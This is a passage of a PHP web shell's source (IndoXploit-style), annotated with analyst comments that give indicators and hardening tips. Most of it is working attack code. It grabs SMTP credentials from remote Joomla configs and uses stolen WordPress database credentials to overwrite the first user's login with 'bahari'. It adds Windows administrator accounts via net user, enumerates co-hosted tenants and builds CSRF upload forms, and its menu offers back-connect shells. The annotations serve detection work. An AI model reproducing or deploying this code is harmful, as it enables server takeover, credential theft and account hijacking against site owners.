  2714. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  2715. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  2716. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  2717. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  2718. echo "</ul>";
  2719. echo "</center>";
  2720. echo"<center>
  2721. <br><br><br>
  2722. VHosts SMTP Grabber<br><br>
  2723. <form method='post'>
  2724. <textarea style='width: 450px; height: 150px;' name='sites' placeholder='http://domen.com/dir_config/config.txt'></textarea><br>
  2725. <input type='submit' name='go' value='Hajar'>
  2726. </form>";
  2727. $ya=$_POST['go'];
  2728. $co=$_POST['sites'];
  2729.  
  2730. if($ya){
  2731. $e=explode("\r\n",$co);
  2732. foreach($e as $bda){
  2733. //echo '<br>'.$bda;
  2734. $linkof='';
  2735. $dn=($bda).($linkof);
  2736. $file=@file_get_contents($dn);
  2737. if(preg_match("/JConfig|joomla/", $file)) {
  2738. echo'<center><font face="Iceland" color=Red >----------------------------------------------</font></center>';
  2739. echo "<font face='Iceland' color=lime >SMTP USER : </font>".findit($file,"smtpuser = '","'")."<br>";
  2740. echo "<font face='Iceland' color=lime >SMTP PASS : </font>".findit($file,"smtppass = '","'")."<br>";
  2741. echo "<font face='Iceland' color=lime >SMTP HOST : </font>".findit($file,"smtphost = '","'")."<br>";
  2742. echo "<font face='Iceland' color=lime >SMTP PORT : </font>".findit($file,"smtpport = '","'")."<br>";
  2743. echo "<font face='Iceland' color=lime >SMTP AUTH : </font>".findit($file,"smtpauth = '","'")."<br>";
  2744. echo "<font face='Iceland' color=lime >SMTP SECURE : </font>".findit($file,"smtpsecure = '","'")."<br>";
  2745. }
  2746.  
  2747. else{echo "<center><font face='Iceland' color='Red' >".$bda." ----> There is no SMTP </font></center>";}
  2748. echo'<center><font face="Iceland" color=red >----------------------------------------------</font></center>';
  2749. }
  2750.  
  2751. }
  2752.  
  2753.  
  2754. }
  2755. elseif($_GET['do'] == 'scdc') {
        // [analysis] Script Encode and Decode branch of the web shell, selected by the do=scdc query parameter.
        // It takes the POST field code and either wraps it in, or unwraps it from, one of three
        // encoding stacks built from base64, gzdeflate/gzinflate and str_rot13.
        // These layers are encoding, not encryption: nothing here uses a key.
        // Defender note: the same stacks are commonly seen wrapped around eval() in obfuscated PHP
        // droppers, so static rules that look for nested base64_decode / gzinflate / str_rot13 calls
        // remain a useful file-scanning signal.
        // The tool menu below is repeated verbatim in every branch; $dir is set outside this excerpt
        // and is interpolated into each href without escaping.
  2756. echo "<center>";
  2757. echo "<ul>";
  2758. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  2759. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  2760. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  2761. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  2762. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  2763. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  2764. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  2765. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  2766. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  2767. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  2768. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  2769. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  2770. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  2771. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  2772. echo "</ul>";
  2773. echo "</center>";
  2774.  
        // Raw request field, read without validation; it is the input to every transform below.
  2775. $text = $_POST['code'];
  2776. echo"<center><br><b>Script Encode and Decode</b><br>
  2777. <form method='post'><br><br><br>
  2778. <textarea style='width: 450px; height: 150px;' name='code' placeholder='scmu'></textarea><br><br>
  2779. <select class='inputz' size='1' name='ope'>
  2780. <option value='base64'>Base64</option>
  2781. <option value='gzinflate'>str_rot13 - gzinflate - base64</option>
  2782. <option value='str'>str_rot13 - gzinflate - str_rot13 - base64</option>
  2783. </select>&nbsp;<input type='submit' name='submit' value='Encrypt'>
  2784. <input type='submit' name='submits' value='Decrypt'>
  2785. </form>";
        // Encrypt button: $codi becomes the encoded form of $text for the selected stack.
  2786. $submit = $_POST['submit'];
  2787. if (isset($submit)) {
  2788. $op = $_POST["ope"];
  2789. switch ($op) {
  2790. case 'base64':
  2791. $codi = base64_encode($text);
  2792. break;
  2793. case 'str':
  2794. $codi = (base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
  2795. break;
  2796. case 'gzinflate':
  2797. $codi = base64_encode(gzdeflate(str_rot13($text)));
  2798. break;
  2799. default:
  2800. break;
  2801. }
  2802. }
        // Decrypt button: the inverse of each stack above, applied in reverse order.
  2803. $submit = $_POST['submits'];
  2804. if (isset($submit)) {
  2805. $op = $_POST["ope"];
  2806. switch ($op) {
  2807. case 'base64':
  2808. $codi = base64_decode($text);
  2809. break;
  2810. case 'str':
  2811. $codi = str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
  2812. break;
  2813. case 'gzinflate':
  2814. $codi = str_rot13(gzinflate(base64_decode($text)));
  2815. break;
  2816. default:
  2817. break;
  2818. }
  2819. }
        // The result is written into the page without HTML escaping.
  2820. echo "<textarea style='width: 450px; height: 150px;' readonly>$codi</textarea></center><BR><BR>";
  2821. }
  2822. elseif($_GET['do'] == 'csrf') {
        // [analysis] CSRF ONLINE branch, selected by do=csrf.
        // It renders a second HTML form whose action is the URL given in POST target and whose
        // single file input is named after the value chosen in POST array. That generated form is
        // submitted by the operator's browser (target=_blank), not by this server, so the host
        // running the shell makes no outbound connection from this branch.
        // Defender note: on the compromised host the only trace is the POST to the shell itself
        // with do=csrf in the query string. On the receiving side, upload endpoints should require
        // an authenticated session and an anti-CSRF token, and should validate type and storage
        // location of uploaded files rather than trusting the field name.
        // $url and $pf are echoed into HTML attributes without escaping.
  2823. echo "<center>";
  2824. echo "<ul>";
  2825. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  2826. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  2827. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  2828. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  2829. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  2830. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  2831. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  2832. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  2833. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  2834. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  2835. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  2836. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  2837. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  2838. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  2839. echo "</ul>";
  2840. echo "</center>";
  2841.  
  2842. echo"<center> CSRF ONLINE
  2843. <html>
  2844. <form method='post'>
  2845. <select name='array' required>
  2846. <option value=''>Array</option>
  2847. <option value='files[]'>files []</option>
  2848. <option value='qqfile'>qqfile</option>
  2849. <option value='Filedata'>Filedata</option>
  2850. <option value='FileUpload'>FileUpload</option>
  2851. <option value='userfile'>userfile</option>
  2852. <option value='Uploadfile'>Uploadfile</option>
  2853. <option value='file'>file</option>
  2854. </select>
  2855. <input type='text' name='target' size='50' height='10' placeholder='url http://site.com/bug/vuln.php' style='margin: 5px auto; padding-left: 5px;' required><br>
  2856. <input type='submit' name='kunci' value='Lock!'>
  2857. </form>";
  2858.  
        // All three values come straight from the request; none is validated or encoded.
  2859. $url = $_POST['target'];
  2860. $pf = $_POST['array'];
  2861. $terkuncyihh = $_POST['kunci'];
  2862. if($terkuncyihh) {
  2863. echo "<form method='post'
  2864. target='_blank' action='$url'
  2865. enctype='multipart/form-data'>
  2866. <input type='file' name='$pf'>
  2867. <input type='submit' name='g'
  2868. value='Hajar'></form";
  2869. }
  2870. }
  2871. elseif($_GET['do'] == 'dos') {
        // [analysis] Domain On User branch, selected by do=dos.
        // It reads /etc/named.conf and lists /var/named, then looks up the owner of
        // /etc/valiases/<domain> with fileowner() and posix_getpwuid() to group domain names by
        // local account, and prints the result as links.
        // Defender note: this is tenant enumeration on a shared host and works only where those
        // paths are readable by the PHP user. Relevant hardening is per-account open_basedir or
        // filesystem isolation, tight permissions on DNS zone and alias directories, and
        // disabling the posix_* functions for web-facing PHP where they are not needed.
        // Names read from disk are echoed into HTML without escaping.
  2872. echo "<center>";
  2873. echo "<ul>";
  2874. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  2875. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  2876. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  2877. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  2878. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  2879. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  2880. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  2881. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  2882. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  2883. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  2884. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  2885. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  2886. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  2887. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  2888. echo "</ul>";
  2889. echo "</center>";
  2890.  
        // $all maps account name to the list of domains attributed to it.
  2891. $all = array();
  2892. // domain finder.
        // Two sources are tried: the BIND configuration file and the zone file directory.
  2893. $d0mains = file('/etc/named.conf');
  2894. $domains = scandir("/var/named");
  2895.  
  2896. if($domains or $d0mains){
  2897. $count = 0;
        // Preferred source: directory entries containing .db, with that suffix removed.
  2898. if($domains){
  2899. echo "<center><h1>Count Domains on user</h1></center><br><br>";
  2900. $cur = array();
  2901. foreach($domains as $domain){
  2902. if(strpos($domain, '.db')){
  2903. $dom = str_replace('.db', '', $domain);
  2904. $own = posix_getpwuid(fileowner("/etc/valiases/$dom"));
  2905. $user = $own['name'];
  2906. $all[$user][] = $dom;
  2907. //echo "$user: $dom<br/>";
  2908. }
  2909. }
  2910. echo "";
  2911. }
        // Fallback source, reached only when scandir() returned nothing: zone lines of named.conf.
        // $dom[1][0] is appended when the length test on $domain[1][0] passes.
  2912. elseif($d0mains){
  2913.  
  2914. $mck = array();
  2915. foreach($d0mains as $domain){
  2916. preg_match_all('#zone "(.*)"#',$domain,$dom);
  2917. flush();
  2918. if(strlen(trim($domain[1][0])) >2){
  2919. $mck[] = $dom[1][0];
  2920. }
  2921. }
  2922.  
  2923. $mck = array_unique($mck);
  2924. foreach($mck as $dom){
  2925. $own = posix_getpwuid(fileowner("/etc/valiases/$dom"));
  2926. $user = $own['name'];
  2927. $all[$user][] = $dom;
  2928. //echo "$user: $dom<br/>";
  2929. }
  2930. echo "";
  2931. }
  2932. }
        // Report: one section per account with a count and a link per domain.
  2933. foreach($all as $user => $domain){
  2934. echo "<center>User <font color='red'>$user</font> has <font color='red'>".count($domain)."</font> Domains below :<br></center>";
  2935. echo "<center>---------------<br>";
  2936. foreach($domain as $v){
  2937. echo "<center><a href='http://$v/' target='_blank'>http://$v<a><br></center>";
  2938. }
  2939. echo "<center>---------------";
  2940. echo "<br><br>";
  2941. }
  2942.  
  2943. }
  2944. elseif($_GET['do'] == 'wpes') {
        // [analysis] Auto Edit User WP branch, selected by do=wpes.
        // For each URL in POST link it downloads a text copy of a WordPress configuration, extracts
        // DB_HOST, DB_USER, DB_PASSWORD, DB_NAME and table_prefix with ambilkata() (defined outside
        // this excerpt), connects with the legacy mysql_* API and overwrites user_login and
        // user_pass on the first row returned from the users table ordered by id.
        // Indicators for responders:
        //   - a users-table row whose user_login equals the fixed string assigned to $user below
        //     and whose user_pass is a bare 32-character hex MD5 value;
        //   - a cookie.txt file in the working directory of the script (curl cookie jar);
        //   - outbound requests carrying the fixed Firefox/32.0 User-Agent string set below.
        // Hardening: keep configuration copies and backups out of the web root and unreadable to
        // other accounts, and restrict MySQL to local or allow-listed clients.
        // The mysql_* functions were removed in PHP 7, so this path can only have run on PHP 5.x.
  2945. echo "<center>";
  2946. echo "<ul>";
  2947. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  2948. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  2949. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  2950. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  2951. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  2952. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  2953. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  2954. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  2955. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  2956. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  2957. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  2958. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  2959. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  2960. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  2961. echo "</ul>";
  2962. echo "</center>";
  2963.  
  2964. if($_POST['auto_deface_wp']) {
        // anucurl: HTTP GET of $sites, returning the response body. Follows redirects, sets a
        // 5 second connect timeout, disables TLS peer and host verification, and reads and
        // writes cookies in cookie.txt.
  2965. function anucurl($sites) {
  2966. $ch = curl_init($sites);
  2967. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2968. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2969. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2970. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  2971. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2972. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2973. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2974. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2975. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  2976. $data = curl_exec($ch);
  2977. curl_close($ch);
  2978. return $data;
  2979. }
        // lohgin: HTTP POST of WordPress login form fields to $cek with the same curl options as
        // anucurl (minus the connect timeout). It is not called anywhere in this excerpt.
  2980. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  2981. $post = array(
  2982. "log" => "$userr",
  2983. "pwd" => "$pass",
  2984. "rememberme" => "forever",
  2985. "wp-submit" => "$wp_submit",
  2986. "redirect_to" => "$web",
  2987. "testcookie" => "1",
  2988. );
  2989. $ch = curl_init($cek);
  2990. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2991. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2992. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2993. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2994. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2995. curl_setopt($ch, CURLOPT_POST, 1);
  2996. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  2997. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2998. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2999. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3000. $data = curl_exec($ch);
  3001. curl_close($ch);
  3002. return $data;
  3003. }
        // One configuration URL per CRLF-separated line of the request field.
  3004. $link = explode("\r\n", $_POST['link']);
        // $script is assigned here but not used again within this branch.
  3005. $script = htmlspecialchars($_POST['script']);
        // Fixed replacement credentials; the hash written to the database is an unsalted MD5.
  3006. $user = "bahari";
  3007. $pass = "bahari";
  3008. $passx = md5($pass);
  3009. foreach($link as $dir_config) {
  3010. $config = anucurl($dir_config);
  3011. $dbhost = ambilkata($config,"DB_HOST', '","'");
  3012. $dbuser = ambilkata($config,"DB_USER', '","'");
  3013. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3014. $dbname = ambilkata($config,"DB_NAME', '","'");
  3015. $dbprefix = ambilkata($config,"table_prefix = '","'");
  3016. $prefix = $dbprefix."users";
  3017. $option = $dbprefix."options";
        // Table names and values taken from the downloaded file are concatenated into SQL as-is.
  3018. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3019. $db = mysql_select_db($dbname);
  3020. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3021. $result = mysql_fetch_array($q);
  3022. $id = $result[ID];
        // The first row of the options table supplies the site URL shown in the output.
  3023. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3024. $result2 = mysql_fetch_array($q2);
  3025. $target = $result2[option_value];
  3026. if($target == '') {
  3027. echo "Error, Cant edit the user :(</font><br>";
  3028. } else {
  3029. echo "<font color='lime'>Done</font> >> <a href='$target/wp-login.php' target='_blank'> $target <a><br>
  3030. <font color='lime'>User</font> : bahari<br>
  3031. <font color='lime'>Password</font> : bahari<br>";
  3032. }
        // The account overwrite itself.
  3033. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  3034. if(!$conn OR !$db OR !$update) {
  3035. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  3036. mysql_close($conn);
  3037. } else {
  3038. }
  3039. }
  3040. } else {
  3041. echo "<center><h1>WordPress Auto Edit User</h1>
  3042. <form method='post'>
  3043. Link Config: <br>
  3044. <textarea name='link' placeholder='http://target.com/btm_conf/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  3045. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar'>
  3046. </form></center>";
  3047. }
  3048. }
  3049. elseif($_GET['do'] == 'rdp') {
        // [analysis] RDP-Creator branch, selected by do=rdp. Runs only when PHP_OS starts with win.
        // It shells out through exe() (defined outside this excerpt) to the Windows net command to
        // create a local account, add it to the local administrators group under three localized
        // group names, and optionally check an account, reset its password to a fixed string, or
        // delete it.
        // Detection on the host:
        //   - Security log events 4720 (account created), 4732 (member added to a local group),
        //     4724 (password reset attempt) and 4726 (account deleted);
        //   - process creation of net.exe or net1.exe whose parent is the web server or PHP worker.
        // Indicators: the form defaults for user and pass shown at the end of this branch, and the
        // fixed password string used by option 2.
        // Hardening: run the web application pool as a low-privilege identity that cannot manage
        // local accounts, and disable PHP command-execution functions where the site allows it.
        // htmlspecialchars() below is HTML encoding only; it is not shell argument quoting.
  3050. echo "<center>";
  3051. echo "<ul>";
  3052. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  3053. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  3054. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  3055. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  3056. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  3057. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  3058. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  3059. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  3060. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  3061. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  3062. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  3063. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  3064. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  3065. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  3066. echo "</ul>";
  3067. echo "</center>";
  3068. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
        // Create path: account creation followed by three group-membership attempts.
  3069. if($_POST['create']) {
  3070. $user = htmlspecialchars($_POST['user']);
  3071. $pass = htmlspecialchars($_POST['pass']);
  3072. if(preg_match("/$user/", exe("net user"))) {
  3073. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
  3074. } else {
  3075. $add_user = exe("net user $user $pass /add");
  3076. $add_groups1 = exe("net localgroup Administrators $user /add");
  3077. $add_groups2 = exe("net localgroup Administrator $user /add");
  3078. $add_groups3 = exe("net localgroup Administrateur $user /add");
        // $ip is not assigned anywhere in this excerpt.
  3079. echo "<center>[ RDP ACCOUNT INFO ]<br>
  3080. ------------------------------<br>
  3081. IP: <font color=lime>".$ip."</font><br>
  3082. Username: <font color=lime>$user</font><br>
  3083. Password: <font color=lime>$pass</font><br>
  3084. ------------------------------<br><br>
  3085. [ STATUS ]<br>
  3086. ------------------------------<br>
  3087. </center>";
        // Status lines are driven by whether exe() returned a truthy value for each command.
  3088. if($add_user) {
  3089. echo "[add user] -> <font color='lime'>Berhasil</font><br>";
  3090. } else {
  3091. echo "[add user] -> <font color='red'>Gagal</font><br>";
  3092. }
  3093. if($add_groups1) {
  3094. echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
  3095. } elseif($add_groups2) {
  3096. echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
  3097. } elseif($add_groups3) {
  3098. echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
  3099. } else {
  3100. echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
  3101. }
  3102. echo "------------------------------<br>";
  3103. }
        // Option path: 1 = query an account, 2 = reset its password, 3 = delete it.
  3104. } elseif($_POST['s_opsi']) {
  3105. $user = htmlspecialchars($_POST['r_user']);
  3106. if($_POST['opsi'] == '1') {
  3107. $cek = exe("net user $user");
  3108. echo "Checking username <font color=lime>$user</font> ....... ";
  3109. if(preg_match("/$user/", $cek)) {
  3110. echo "[ <font color=lime>Sudah ada</font> ]<br>
  3111. ------------------------------<br><br>
  3112. <pre>$cek</pre>";
  3113. } else {
  3114. echo "[ <font color=red>belum ada</font> ]";
  3115. }
  3116. } elseif($_POST['opsi'] == '2') {
  3117. $cek = exe("net user $user indoxploit");
  3118. if(preg_match("/$user/", exe("net user"))) {
  3119. echo "[change password: <font color=lime>indoxploit</font>] -> ";
  3120. if($cek) {
  3121. echo "<font color=lime>Berhasil</font>";
  3122. } else {
  3123. echo "<font color=red>Gagal</font>";
  3124. }
  3125. } else {
  3126. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  3127. }
  3128. } elseif($_POST['opsi'] == '3') {
  3129. $cek = exe("net user $user /DELETE");
  3130. if(preg_match("/$user/", exe("net user"))) {
  3131. echo "[remove user: <font color=lime>$user</font>] -> ";
  3132. if($cek) {
  3133. echo "<font color=lime>Berhasil</font>";
  3134. } else {
  3135. echo "<font color=red>Gagal</font>";
  3136. }
  3137. } else {
  3138. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  3139. }
  3140. } else {
  3141. //
  3142. }
        // No action posted: render the two forms.
  3143. } else {
  3144. echo "<center>-- Create RDP --<br>
  3145. <form method='post'>
  3146. <input type='text' name='user' placeholder='username' value='denita' required>
  3147. <input type='text' name='pass' placeholder='password' value='denita' required>
  3148. <input type='submit' name='create' value='>>'>
  3149. </form>
  3150. -- Option --<br>
  3151. <form method='post'>
  3152. <input type='text' name='r_user' placeholder='username' required>
  3153. <select name='opsi'>
  3154. <option value='1'>Cek Username</option>
  3155. <option value='2'>Ubah Password</option>
  3156. <option value='3'>Hapus Username</option>
  3157. </select>
  3158. <input type='submit' name='s_opsi' value='>>'>
  3159. </form></center>
  3160. ";
  3161. }
  3162. } else {
  3163. echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
  3164. }
  3165.  
  3166. }
  3167. elseif($_GET['do'] == 'tetangga') {
        // [analysis] Reverse Domain branch, selected by do=tetangga.
        // It sends the value of GET setan to the third-party lookup endpoint at
        // domains.yougetsignal.com and prints the returned names as links.
        // The request is made server-side with curl, so it originates from the host running the
        // shell. Defender note: egress or proxy logs showing the web server contacting that
        // hostname, and access-log entries with do=tetangga and setan= in the query string, are
        // usable indicators. Default-deny outbound HTTP from web servers removes this capability.
        // $site goes into the POST body without URL encoding and each result into HTML unescaped.
  3168. echo "<center>";
  3169. echo "<ul>";
  3170. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  3171. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  3172. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  3173. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  3174. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  3175. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  3176. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  3177. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  3178. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  3179. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  3180. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  3181. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  3182. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  3183. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  3184. echo "</ul>";
  3185. echo "</center>";
  3186.  
  3187. echo "<center><span style='font-size:30px; font-family:Fredericka the Great; color:#009900'>Reverse Domain ip Lookup</span></center>
  3188. ";
  3189. echo "<div id=result>";
  3190. echo "<center><br><form><input type='text' size='60' placeholder='watch8x.com' name='setan' /><input type='hidden' name='do' value='tetangga'> &nbsp;<input type='submit' value='&nbsp;&check;&nbsp;'></form></center>";
  3191. if(isset($_GET["setan"]))
  3192. {
  3193. $site = $_GET["setan"];
  3194. $setan = "http://domains.yougetsignal.com/domains.php";
  3195.  
  3196. //Curl Function
  3197. $ch = curl_init($setan);
  3198. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  3199. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$site&ket=");
  3200. curl_setopt($ch, CURLOPT_HEADER, 0);
  3201. curl_setopt($ch, CURLOPT_POST, 1);
  3202. $resp = curl_exec($ch);
        // The response is flattened by stripping brackets, braces and quotes with str_replace
        // rather than being parsed; entries are then split on double commas.
  3203. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  3204. $array = explode(",,", $resp);
        // The first segment is discarded before printing.
  3205. unset($array[0]);
  3206. echo "<table style='margin: 0 auto'>";
  3207. foreach($array as $lnk)
  3208. {
  3209. print "<tr><td><a style=\"color:#0f0;font-weight:bold;\" href='$lnk' target=_blank>$lnk</a></td></tr>";
  3210. }
  3211. echo "</table>";
  3212. curl_close($ch);
  3213. }
  3214. }
  3215. elseif($_GET['do'] == 'whmcs') {
  3216. echo "<center>";
  3217. echo "<ul>";
  3218. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  3219. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  3220. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  3221. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  3222. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  3223. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
